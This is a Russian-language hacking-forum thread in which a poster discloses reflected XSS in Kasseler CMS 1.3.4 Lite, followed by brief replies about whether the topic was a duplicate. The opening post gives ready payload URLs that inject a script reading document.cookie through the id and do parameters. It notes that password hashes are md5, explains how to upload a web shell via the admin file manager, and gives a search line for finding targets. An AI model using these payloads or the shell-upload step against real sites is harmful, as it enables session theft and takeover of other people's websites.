Kasseler CMS 1.3.4 Lite возможно и ранние версии http://www.kasseler-cms.net/ Пасивные XSS: 1.http://*****.ru/index.php?module=News&do=View&id=<script>alert(document.cookie)</script> или 2.http://*****.ru/index.php?module=News&do=<script>alert(document.cookie)</script>&id=1 Вообще вместо этих ссылок можно использовать любую... Уязвимые параметры ID и DO именно в них и прокатывает пасивка hash - md5 Заливка шела: Переходим в админку -> Файловый менеджер -> Выбираем нужный нам каталог -> и внизу можно залить файлы в него Как искать: by Kasseler CMS. All rights reserved. Если что то не так прошу меня поправить... =) Все таки первое что нашел сам =)
Qam Да??? =)) А такая есть? =) Все увидел энциклопедию... =) надо было туда закинуть... Сори за невнимательность =)
Qam хм не вижу... =) вобщем спор не имеет смысла так как тема уже создана и удалить я не могу... =) впрочем в седующий раз напишу в энциклопедию
прошу прощение Kraneg,видал тему про активные хсс и привидилось что и про пасивные есть!Вообщем извеняй дружище!Молодец побольше таких бы...
